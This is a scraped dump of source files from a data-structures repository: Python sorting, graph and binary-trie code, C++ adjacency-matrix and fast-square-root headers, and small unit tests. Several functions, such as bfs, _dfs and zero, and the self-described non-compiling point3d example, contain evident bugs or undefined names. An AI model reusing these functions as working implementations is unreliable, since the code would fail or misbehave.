"license_type": "no_license",
"max_line_length": 58,
"num_lines": 149,
"path": "/opendatastructures.org/python/ods/algorithms.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"Implementations of some sorting and graph algorithms\"\"\"\r\nimport random\r\nfrom utils import new_zero_array, new_array, _new_array, w\r\nfrom binaryheap import BinaryHeap\r\n\r\ndef average(a):\r\n s = 0\r\n for i in range(len(a)):\r\n s += a[i]\r\n return s/len(a)\r\n\r\ndef left_shift_a(a):\r\n for i in range(len(a)-1):\r\n a[i] = a[i+1]\r\n a[len(a)-1] = None\r\n\r\ndef left_shift_b(a):\r\n a[0:len(a)-1] = a[1:len(a)]\r\n a[len(a)-1] = None\r\n\r\ndef zero(a):\r\n a[0:len(a)] = 0\r\n\r\ndef merge_sort(a):\r\n if len(a) <= 1:\r\n return a\r\n m = len(a)//2\r\n a0 = merge_sort(a[:m])\r\n a1 = merge_sort(a[m:])\r\n merge(a0, a1, a)\r\n return a\r\n\r\ndef merge(a0, a1, a):\r\n i0 = i1 = 0\r\n for i in range(len(a)):\r\n if i0 == len(a0):\r\n a[i] = a1[i1]\r\n i1 += 1\r\n elif i1 == len(a1):\r\n a[i] = a0[i0]\r\n i0 += 1\r\n elif a0[i0] <= a1[i1]:\r\n a[i] = a0[i0]\r\n i0 += 1\r\n else:\r\n a[i] = a1[i1]\r\n i1 += 1\r\n\r\n_random_int = random.randrange\r\n\r\ndef quick_sort(a):\r\n _quick_sort(a, 0, len(a))\r\n\r\ndef _quick_sort(a, i, n):\r\n if n <= 1: return\r\n x = a[i + _random_int(n)]\r\n (p, j, q) = (i-1, i, i+n)\r\n while j < q:\r\n if a[j] < x:\r\n p += 1\r\n a[j], a[p] = a[p], a[j]\r\n j += 1\r\n elif a[j] > x:\r\n q -= 1\r\n a[j], a[q] = a[q], a[j]\r\n else:\r\n j += 1\r\n _quick_sort(a, i, p-i+1)\r\n _quick_sort(a, q, n-(q-i))\r\n\r\ndef heap_sort(a):\r\n h = BinaryHeap()\r\n h.a = a\r\n h.n = len(a)\r\n m = h.n//2\r\n for i in range(m-1, -1, -1):\r\n h.trickle_down(i)\r\n while h.n > 1:\r\n h.n -= 1\r\n h.a[h.n], h.a[0] = h.a[0], h.a[h.n]\r\n h.trickle_down(0)\r\n a.reverse()\r\n \r\ndef counting_sort(a, k):\r\n c = new_zero_array(k)\r\n for i in range(len(a)):\r\n c[a[i]] += 1 \r\n for i in range(1, k):\r\n c[i] += c[i-1] \r\n b = new_array(len(a))\r\n for i in range(len(a)-1, -1, -1):\r\n c[a[i]] -= 1 \r\n b[c[a[i]]] = a[i] \r\n return b\r\n \r\nd = 8\r\n\r\ndef radix_sort(a):\r\n for p in range(w//d):\r\n c = new_zero_array(1<<d)\r\n b = new_array(len(a))\r\n for i in range(len(a)):\r\n bits = (a[i] >> d*p)&((1<<d)-1) \r\n c[bits] += 1 \r\n for i in range(1, 1<<d):\r\n c[i] += c[i-1]\r\n for i in range(len(a)-1, -1, -1):\r\n bits = (a[i] >> d*p)&((1<<d)-1)\r\n c[bits] -=1\r\n b[c[bits]] = a[i] \r\n a = b\r\n return b\r\n\r\ndef bfs(g, r):\r\n seen = new_boolean_array(n)\r\n q = SLList()\r\n q.add(r)\r\n seen[r] = True\r\n while q.size() > 0:\r\n i = q.remove()\r\n for j in g.out_edges(i):\r\n if seen[j] is False:\r\n q.add(j)\r\n seen[j] = True\r\n\r\nwhite, grey, black = 0, 1, 2\r\n\r\ndef dfs(g, r):\r\n c = new_array(g.n)\r\n _dfs(g, r, c)\r\n \r\ndef _dfs(g, i, c):\r\n c[i] = grey\r\n for j in g.out_edges(i):\r\n if c[j] == white:\r\n c[j] = grey\r\n dfs(g, j, c)\r\n c[i] = black\r\n \r\ndef dfs2(g, r):\r\n c = new_array(g.n)\r\n s = SLList()\r\n s.push(r)\r\n while s.size() > 0:\r\n i = s.pop()\r\n if c[i] == white:\r\n c[i] = grey\r\n for j in g.out_edges(i):\r\n s.push(j)\r\n \r\n\r\n \r\n"
},
{
"alpha_fraction": 0.5441176295280457,
"alphanum_fraction": 0.5563725233078003,
"avg_line_length": 14.319999694824219,
"blob_id": "0ae38ef4eaec978547785fcba808a7008e73dc06",
"content_id": "af35fdf365ffe4aed49b8ffa1698d661c629a872",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 816,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 50,
"path": "/opendatastructures.org/cpp/AdjacencyMatrix.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyMatrix.h\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#ifndef ADJACENCYMATRIX_H_\r\n#define ADJACENCYMATRIX_H_\r\n\r\nnamespace ods {\r\n\r\nclass AdjacencyMatrix {\r\nprotected:\r\n\tint n;\r\n\tbool **a;\r\npublic:\r\n\tAdjacencyMatrix(int n);\r\n\tvirtual ~AdjacencyMatrix();\r\n\tvoid addEdge(int i, int j) {\r\n\t\ta[i][j] = true;\r\n\t}\r\n\r\n\tvoid removeEdge(int i, int j) {\r\n\t\ta[i][j] = false;\r\n\t}\r\n\r\n\tbool hasEdge(int i, int j) {\r\n\t\treturn a[i][j];\r\n\t}\r\n\r\n\ttemplate<class List>\r\n\tvoid outEdges(int i, List &edges) {\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\tif (a[i][j]) edges.add(j);\r\n\t}\r\n\r\n\ttemplate<class List>\r\n\tvoid inEdges(int i, List &edges) {\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\tif (a[j][i]) edges.add(j);\r\n\t}\r\n\r\n\tint nVertices() {\r\n\t\treturn n;\r\n\t}\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* ADJACENCYMATRIX_H_ */\r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "b306f10e2d6e7334d4136f58ebf0cfd1544c525b",
"content_id": "f0dda74321d0fca11297290ae54ffa9be24cb7ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BinaryTree.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryTree.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryTree.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.550632894039154,
"avg_line_length": 11.166666984558105,
"blob_id": "b5cd45a85a910559c9fb17d720e84aebe15db70a",
"content_id": "dfe6d4110e64719aef25f40188a6aa967a14a7e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/MeldableHeap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * MeldableHeap.cpp\r\n *\r\n * Created on: 2011-11-30\r\n * Author: morin\r\n */\r\n\r\n#include \"MeldableHeap.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.45625001192092896,
"alphanum_fraction": 0.49204546213150024,
"avg_line_length": 20.564102172851562,
"blob_id": "3395137a4a1bf9529108fc4980a12060d9979df9",
"content_id": "2475012fa81579445f71739c6b3575b50a35bb30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1760,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 78,
"path": "/opendatastructures.org/cpp/FastSqrt.h",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastSqrt.h\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#ifndef FASTSQRT_H_\r\n#define FASTSQRT_H_\r\n\r\nnamespace ods {\r\n\r\nstatic int *sqrtab;\r\nstatic int *logtab;\r\n\r\nclass FastSqrt {\r\nprotected:\r\n\tstatic const int halfint = 1<<16;\r\n\tstatic const int r = 29;\r\n\r\n\t/**\r\n\t * Initialize the logarithm and square root tables\r\n\t */\r\n\tstatic void inittabs(int dummy) {\r\n\t\tsqrtab = new int[halfint];\r\n\t\tlogtab = new int[halfint];\r\n\t\tfor (int d = 0; d < 16; d++)\r\n\t\t\tfor (int k = 0; k < 1<<d; k++)\r\n\t\t\t\tlogtab[(1<<d)+k] = d;\r\n\t\tint s = 1<<7; // sqrt(2^14)\r\n\t\tfor (int i = 0; i < halfint; i++) {\r\n\t\t\tif ((s+1)*(s+1) <= i << 14) s++; // sqrt increases\r\n\t\t\tsqrtab[i] = s;\r\n\t\t}\r\n\t}\r\n\t/* Fake code that appears only in the book\r\n\tvoid inittabs() {\r\n\t\tsqrtab = new int[1<<(r/2)];\r\n\t\tlogtab = new int[1<<(r/2)];\r\n\t\tfor (int d = 0; d < r/2; d++)\r\n\t\t\tfor (int k = 0; k < 1<<d; k++)\r\n\t\t\t\tlogtab[1<<d+k] = d;\r\n\t\tint s = 1<<(r/4); // sqrt(2^(r/2))\r\n\t\tfor (int i = 0; i < 1<<(r/2); i++) {\r\n\t\t\tif ((s+1)*(s+1) <= i << (r/2)) s++; // sqrt increases\r\n\t\t\tsqrtab[i] = s;\r\n\t\t}\r\n\t}\r\n\t*/\r\npublic:\r\n\tstatic void init() { inittabs(0); };\r\n\tstatic int log(int x) {\r\n\t\tif (x >= halfint)\r\n\t\t\treturn 16 + logtab[x>>16];\r\n\t\treturn logtab[x];\r\n\t}\r\n\r\n\tstatic int sqrt(int x) {\r\n\t\tint rp = log(x);\r\n\t\tint upgrade = ((r-rp)/2) * 2;\r\n\t\tint xp = x << upgrade; // xp has r or r-1 bits\r\n\t\tint s = sqrtab[xp>>(r/2)] >> (upgrade/2);\r\n\t\twhile ((s+1)*(s+1) <= x) s++; // executes at most twice\r\n\t\treturn s;\r\n\t}\r\n\r\n\t/* Fake code used only in the book\r\n\tint sqrt(int x, int r) {\r\n\t\tint s = sqrtab[x>>r/2];\r\n\t\twhile ((s+1)*(s+1) <= x) s++; // executes at most twice\r\n\t\treturn s;\r\n\t}\r\n\t*/\r\n\r\n};\r\n\r\n} /* namespace ods */\r\n#endif /* FASTSQRT_H_ */\r\n"
},
{
"alpha_fraction": 0.4357541799545288,
"alphanum_fraction": 0.5474860072135925,
"avg_line_length": 38,
"blob_id": "b0d5dc8975ea014199903a35dfee79334f3de391",
"content_id": "8c8ba407f38c6633743ddc6f8647b6fa6e8f3093",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 358,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 9,
"path": "/opendatastructures.org/python/ods/point3d.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"This code doesn't even compile---it's just used as an example\"\"\"\r\n\"\"\"\r\nclass Point3D(object):\r\n def hash_code(self):\r\n z = [0x2058cc50, 0xcb19137e, 0x2cb6b6fd]\r\n zz = 0xbea0107e5067d19d\r\n h = [x0.hash_code(), x1.hash_code(), x2.hash_code()]\r\n return \\ensuremath{(((z[0]*h[0] + z[1]*h[1] + z[2]*h[2])*zz)%(1<<2*w)) >> w}\r\n\"\"\""
},
{
"alpha_fraction": 0.6870229244232178,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 16.428571701049805,
"blob_id": "788e0ebe3b637cb3a698b9e254e63ec4809e3e35",
"content_id": "53c5ec155c88f32e1f0067a812f7ed55cf1ff92e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_treap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\r\nfrom nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_treap():\r\n exercise_sset(ods.Treap())\r\n"
},
{
"alpha_fraction": 0.4147094190120697,
"alphanum_fraction": 0.42430996894836426,
"avg_line_length": 27.084999084472656,
"blob_id": "08519cb7f5939a9dc63b3f613e7e8a4e8a7f96a0",
"content_id": "f1c1f1363d9b4f01d28ea433859ffb0248b268cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5833,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 200,
"path": "/opendatastructures.org/python/ods/binarytrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"An implementation of a binary trie for storing w bit integers\r\n\r\nThis structure is able to store elements, x, where int(x) is an unsigned\r\nw bit integer.\r\n\"\"\"\r\n\r\nfrom utils import new_array, w, binfmt\r\nfrom base import BaseSet\r\n\r\n\r\nclass BinaryTrie(BaseSet):\r\n class Node(object):\r\n def __init__(self):\r\n self.child = new_array(2)\r\n self.jump = None\r\n self.parent = None\r\n self.x = None\r\n\r\n @property\r\n def left(self):\r\n return self.child[0]\r\n\r\n @left.setter\r\n def left(self, u):\r\n self.child[0] = u\r\n\r\n @property\r\n def right(self):\r\n return self.child[1]\r\n\r\n @right.setter\r\n def right(self, u):\r\n self.child[1] = u\r\n\r\n @property\r\n def prev(self):\r\n return self.child[0]\r\n\r\n @prev.setter\r\n def prev(self, u):\r\n self.child[0] = u\r\n\r\n @property\r\n def next(self):\r\n return self.child[1]\r\n\r\n @next.setter\r\n def next(self, u):\r\n self.child[1] = u\r\n \r\n def __str__(self):\r\n return \"{\" + str(self.x) + \"}\"\r\n \r\n def _new_node(self):\r\n return BinaryTrie.Node()\r\n \r\n def __init__(self):\r\n super(BinaryTrie, self).__init__()\r\n self._initialize()\r\n \r\n def _initialize(self):\r\n self.dummy = self._new_node()\r\n self.dummy.prev = self.dummy.next = self.dummy\r\n self.r = self._new_node()\r\n self.r.jump = self.dummy\r\n self.n = 0\r\n \r\n def clear(self):\r\n self._initialize()\r\n \r\n def add(self, x):\r\n ix = int(x)\r\n u = self.r\r\n # 1 - search for ix until falling out of the tree\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: break\r\n u = u.child[c]\r\n i += 1\r\n if i == w: return False # already contains x - abort\r\n pred = [u.jump.prev, u.jump][c]\r\n u.jump = None # u will soon have two children\r\n \r\n # 2 - add the path to ix\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n u.child[c] = self._new_node()\r\n u.child[c].parent = u\r\n u = u.child[c]\r\n i += 1\r\n u.x = x\r\n \r\n # 3 - add u to the linked list\r\n u.prev = pred\r\n u.next = pred.next\r\n u.prev.next = u\r\n u.next.prev = u\r\n \r\n # 4 - walk back up, updating jump pointers\r\n v = u.parent\r\n while v is not None:\r\n if (v.left is None \r\n and (v.jump is None or int(v.jump.x) > ix)) \\\r\n or (v.right is None\r\n and (v.jump is None or int(v.jump.x) < ix)):\r\n v.jump = u\r\n v = v.parent\r\n self.n += 1\r\n return True\r\n \r\n def find(self, x):\r\n ix = int(x)\r\n u = self.r\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: break\r\n u = u.child[c]\r\n i += 1\r\n if i == w: return u.x # found it\r\n u = [u.jump, u.jump.next][c]\r\n if u is self.dummy: return None\r\n return u.x\r\n \r\n def remove(self, x):\r\n ix = int(x)\r\n u = self.r\r\n # 1 - find leaf, u, that contains x\r\n i = 0\r\n while i < w:\r\n c = (ix >> w-i-1) & 1\r\n if u.child[c] is None: return False\r\n u = u.child[c]\r\n i += 1\r\n \r\n # 2 - remove u from linked list\r\n u.prev.next = u.next\r\n u.next.prev = u.prev\r\n v = u\r\n \r\n # 3 - delete nodes on path to u\r\n for i in range(w-1, -1, -1):\r\n c = (ix >> w-i-1) & 1\r\n v = v.parent\r\n v.child[c] = None\r\n if v.child[1-c] is not None: break\r\n \r\n # 4 - update jump pointers\r\n pred = u.prev\r\n succ = u.next\r\n v.jump = [pred, succ][v.left is None]\r\n v = v.parent\r\n while v is not None:\r\n if v.jump is u:\r\n v.jump = [pred, succ][v.left is None]\r\n v = v.parent\r\n \r\n self.n -= 1\r\n return True\r\n \r\n def _check(self):\r\n u = self.dummy.next\r\n i = 0\r\n while u is not self.dummy:\r\n assert(u.next.prev is u)\r\n u = u.next\r\n i += 1\r\n assert(i == self.n)\r\n self._check_it() \r\n\r\n def _check_it(self, u=None, d=0, prefix=0):\r\n \"\"\"Consistency check of the subtree rooted at u (with depth d)\"\"\"\r\n if u is None: u = self.r\r\n if d == w:\r\n assert(u.x == prefix)\r\n else:\r\n assert(u is self.r or u.left is not None or u.right is not None)\r\n if u.left is None and u.right is not None:\r\n # TODO: check u.jump.x against prefix\r\n val = prefix << w-d-1\r\n assert(u.jump.x is not None)\r\n assert(u.jump.x >> w-d == prefix)\r\n assert(u.jump.x >> w-d-1 == (prefix << 1)|1)\r\n if u.right is None and u.left is not None:\r\n assert(u.jump.x is not None)\r\n assert(u.jump.x >> w-d == prefix)\r\n assert(u.jump.x >> w-d-1 == (prefix << 1))\r\n if u.left is not None and u.right is not None:\r\n assert(u.jump is None)\r\n if u.left is not None:\r\n self._check_it(u.left, d+1, prefix << 1)\r\n if u.right is not None:\r\n self._check_it(u.right, d+1, (prefix << 1) | 1)\r\n \r\n def __iter__(self):\r\n u = self.dummy.next\r\n while u != self.dummy:\r\n yield u.x\r\n u = u.next\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.4340175986289978,
"alphanum_fraction": 0.4692082107067108,
"avg_line_length": 19.0625,
"blob_id": "6c621ef8eb3f9e846d90c83c15c4b9187c9a58e6",
"content_id": "715071d335201a1b24e14f04243188ec09488498",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 16,
"path": "/opendatastructures.org/python/ods/tests/heaptest.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\n\r\ndef exercise_heap(h=None):\r\n if h is None: return\r\n a0 = []\r\n h\r\n n = 1000\r\n for _ in range(n):\r\n x = random.randrange(5*n)\r\n a0.append(x)\r\n h.add(x)\r\n assert(len(h) == len(a0))\r\n a1 = [h.remove() for _ in range(n)]\r\n assert(sorted(a0) == a1)\r\n assert(len(h) == 0)\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.48140496015548706,
"alphanum_fraction": 0.5103305578231812,
"avg_line_length": 15.285714149475098,
"blob_id": "63a9008b01d1d4b6b7ed0ce48379e39cbc445680",
"content_id": "038bd762effea13eb5040a61cfec73014909ded0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 484,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 28,
"path": "/opendatastructures.org/cpp/AdjacencyMatrix.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * AdjacencyMatrix.cpp\r\n *\r\n * Created on: 2012-01-13\r\n * Author: morin\r\n */\r\n\r\n#include \"AdjacencyMatrix.h\"\r\n\r\nnamespace ods {\r\n\r\nAdjacencyMatrix::AdjacencyMatrix(int n0) {\r\n\tn = n0;\r\n\ta = new bool*[n];\r\n\tfor (int i = 0; i < n; i++)\r\n\t\ta[i] = new bool[n];\r\n\tfor (int i = 0; i < n; i++)\r\n\t\tfor (int j = 0; j < n; j++)\r\n\t\t\ta[i][j] = false;\r\n}\r\n\r\nAdjacencyMatrix::~AdjacencyMatrix() {\r\n\tfor (int i = 0; i < n; i++)\r\n\t\tdelete[] a[i];\r\n\tdelete[] a;\r\n}\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 19.200000762939453,
"blob_id": "ccfcb36904ceb58efb003a29aee113723903dccd",
"content_id": "b0570df28967635f3864951e1b5e5c7fd4c13956",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 5,
"path": "/opendatastructures.org/python/ods/tests/test_linearhashtable.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import ods\r\nfrom settest import exercise_set\r\n\r\ndef test_cht():\r\n exercise_set(ods.LinearHashTable())\r\n"
},
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.713178277015686,
"avg_line_length": 19.5,
"blob_id": "a2866ef9c82f26186e60175a563720cba9250532",
"content_id": "f073c1866aff15a0c79d00ab7e5ef93e486f364a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/opendatastructures.org/python/ods/tests/test_yfasttrie.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_bst():\r\n exercise_sset(ods.YFastTrie())\r\n"
}
] | 62 |
CapnOdin/temp_checker | https://github.com/CapnOdin/temp_checker | 2f1e10cfc495a64fc686359949e04f0126de314b | 0d4f65e13aadcf00d6f23022e728a7164d74a797 | 6986dfb8bbd02df3425c2c750ed0b3051d8044b3 | refs/heads/master | 2023-08-21T17:51:43.384064 | 2021-06-14T07:49:09 | 2021-06-14T07:49:09 | 404,248,099 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6396396160125732,
"alphanum_fraction": 0.6531531810760498,
"avg_line_length": 25.909090042114258,
"blob_id": "8bcace86a13027aa761c14baa56da432c9494d78",
"content_id": "10f1815ab2e10781dca8eafa27ea6e0bc3e55267",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1777,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 66,
"path": "/temp_checker/temp_checker.py",
"repo_name": "CapnOdin/temp_checker",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport os.path, subprocess, sys, argparse, re, time\n\nA_ScriptDir = os.path.dirname(os.path.realpath(__file__))\nA_WorkingDir = os.getcwd()\n\ntemperature_regex = re.compile(\"\\+\\d+(\\.\\d+)?°C\")\n\ndef run_with_output(cmd, shell = False):\n\toutput = \"\"\n\tp = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE, stderr = subprocess.STDOUT, universal_newlines = True)\n\twhile p.poll() is None:\n\t\tline = p.stdout.readline()\n\t\t#print(line, end = \"\")\n\t\toutput += line\n\tp.stdout.close()\n\tp.wait()\n\t\n\tif(p.returncode != 0):\n\t\tprint(\"error\")\n\t\tsys.exit(p.returncode)\n\t\n\treturn output\n\n\ndef get_temperature():\n\tmatch = temperature_regex.search(run_with_output(\"sensors | grep temp1:\", shell = True))\n\tif(match):\n\t\treturn match.group(0)\n\treturn \"\"\n\n\ndef collect_samples(timeout = 100, interval = 10):\n\topen(\"temps\", \"w\").close()\n\tstart = time.time_ns()\n\ttimeout *= 60 * 1e9\n\t\n\twhile(timeout == 0 or time.time_ns() - start < timeout):\n\t\ttry:\n\t\t\ttemp = get_temperature()\n\t\t\tprint(temp)\n\t\t\tf = open(\"temps\", \"a\")\n\t\t\tf.write(temp + \"\\n\")\n\t\t\tf.close()\n\t\t\ttime.sleep(interval)\n\t\texcept IOError:\n\t\t\ttime.sleep(0.1)\n\ndef main():\n\tparser = argparse.ArgumentParser(description = \"Script to check the CPU temerature.\")\n\t\n\tparser.add_argument(\"-i\", \"--interval\", metavar = \"NUMBER\", default = 10, type = int, help = \"set interval between each sample in secounds (10s)\")\n\tparser.add_argument(\"-t\", \"--timeout\", metavar = \"NUMBER\", default = -1, type = int, help = \"set duration where the samples will be collected in minuts, set to 0 for no timeout (-1)\")\n\t\n\targs = parser.parse_args()\n\t#try:\n\tif(args.timeout == -1):\n\t\tprint(get_temperature())\n\telse:\n\t\tcollect_samples(timeout = args.timeout, interval = args.interval)\n\t#except:\n\t#\tpass\n\t\nif __name__ == \"__main__\":\n\tmain()\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "9d0bca5e2634fc2387ac511aee8a52bee68d93e1",
"content_id": "f80fefaedd7f5d3a274e39bf584070558a9e14d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/temp_checker/__init__.py",
"repo_name": "CapnOdin/temp_checker",
"src_encoding": "UTF-8",
"text": "from temp_checker import *\n"
}
] | 2 |
GuruOfPython/python_test_codes | https://github.com/GuruOfPython/python_test_codes | 62d6a4303bb3b1d0fda261df76f2204cbe2a159e | cbb29ccc72339b4aaa735145e202cc4499d82ab4 | 5d86cf15ac170262de20c6928c08c2296228fcba | refs/heads/master | 2020-06-29T14:36:22.451877 | 2019-08-05T01:34:57 | 2019-08-05T01:34:57 | 200,562,039 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.499627947807312,
"alphanum_fraction": 0.5021083354949951,
"avg_line_length": 36.562110900878906,
"blob_id": "bacefa6331f6ff927400355d2808cd5fd6b076a4",
"content_id": "a97c2304fe4d16db4e2166027d91f2c22c6d5fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12095,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 322,
"path": "/test_for_upwork.py",
"repo_name": "GuruOfPython/python_test_codes",
"src_encoding": "UTF-8",
"text": "# Copyright (c) 2019 Applied Nonprofit Research. All rights reserved.\n# Requires Python 3.7+.\n\nimport itertools\nfrom typing import Dict, Tuple, List, Iterator, Optional, Any, Union\n\nimport pytest\n\ndata_types: Dict = {\n \"folder_in_root\": \"Folder\",\n \"text_in_root\": \"Simple\",\n \"list_in_folder\": \"List\",\n \"text_in_list_in_folder\": \"Simple\",\n \"int_in_list_in_folder\": \"Simple\",\n \"list_in_root\": \"List\",\n \"text_in_list\": \"Simple\",\n \"outer_nested_list\": \"List\",\n \"text_in_outer_nested_list\": \"Simple\",\n \"inner_nested_list\": \"List\",\n \"text_in_inner_nested_list\": \"Simple\",\n \"dictionary_in_inner_nested_list\": \"Dictionary\",\n \"text_in_dictionary_in_inner_nested_list\": \"Simple\",\n \"dictionary_in_root\": \"Dictionary\",\n \"text_in_dictionary\": \"Simple\",\n \"int_in_dictionary\": \"Simple\",\n \"outer_nested_dictionary\": \"Dictionary\",\n \"text_in_outer_nested_dictionary\": \"Simple\",\n \"inner_nested_dictionary\": \"Dictionary\",\n \"text_in_inner_nested_dictionary\": \"Simple\",\n \"list_in_inner_nested_dictionary\": \"List\",\n \"text_in_list_in_inner_nested_dictionary\": \"Simple\"\n}\n\[email protected]()\ndef common_values() -> Dict:\n return {\n \"text_in_folder\": \"foo\",\n \"list_in_folder\": [\n {\n \"text_in_list_in_folder\": \"a\"\n },\n {\n \"text_in_list_in_folder\": \"b\",\n \"int_in_list_in_folder\": 2\n },\n {\n \"text_in_list_in_folder\": \"c\",\n \"int_in_list_in_folder\": 3\n }\n ],\n \"outer_nested_list\": [\n {\n \"text_in_outer_nested_list\": \"a\"\n },\n {\n \"text_in_outer_nested_list\": \"b\",\n \"inner_nested_list\": [\n {}\n ]\n },\n {\n \"text_in_outer_nested_list\": \"c\",\n \"inner_nested_list\": [\n {\n \"text_in_inner_nested_list\": \"foo\"\n },\n {\n \"text_in_inner_nested_list\": \"bar\",\n \"dictionary_in_inner_nested_list\": {\n \"black\": {\"text_in_dictionary_in_inner_nested_list\": \"white\"},\n \"green\": {\"text_in_dictionary_in_inner_nested_list\": \"red\"}\n }\n }\n ]\n }\n ],\n \"dictionary_in_root\": {\n \"peter\": {\n \"text_in_dictionary\": \"a\"\n },\n \"paul\": {\n \"text_in_dictionary\": \"b\",\n \"int_in_dictionary\": 2\n },\n \"mary\": {\n \"text_in_dictionary\": \"c\",\n \"int_in_dictionary\": 3\n }\n },\n \"outer_nested_dictionary\": {\n \"peter\": {\n \"text_in_outer_nested_dictionary\": \"a\"\n },\n \"paul\": {\n \"text_in_outer_nested_dictionary\": \"b\",\n \"inner_nested_dictionary\": {\n \"red\": {}\n }\n },\n \"mary\": {\n \"text_in_outer_nested_dictionary\": \"c\",\n \"inner_nested_dictionary\": {\n \"orange\": {\n \"text_in_inner_nested_dictionary\": \"foo\"\n },\n \"yellow\": {\n \"text_in_inner_nested_dictionary\": \"bar\",\n \"list_in_inner_nested_dictionary\": [\n {\"text_in_list_in_inner_nested_dictionary\": \"black\"},\n {\"text_in_list_in_inner_nested_dictionary\": \"white\"},\n ]\n }\n }\n }\n }\n }\n\n# SO 10823877\ndef flatten(container: Union[List, Tuple]) -> Iterator:\n \"\"\"Flattens an arbitrarily nested list.\"\"\"\n for i in container:\n if isinstance(i, (list, tuple)): # I didn't know you could supply a tuple of classes...\n for j in flatten(i):\n yield j\n else:\n yield i\n\ndef _cartesian(block_values: List) -> Iterator[List[Optional[Any]]]:\n \"\"\"Starts with an arbitrarily nested list of lists, where each singly nested list represents all observed values for\n one or more columns in a spreadsheet column block. Yields lists representing rows of the column block.\"\"\"\n for nested in itertools.product(*block_values):\n yield 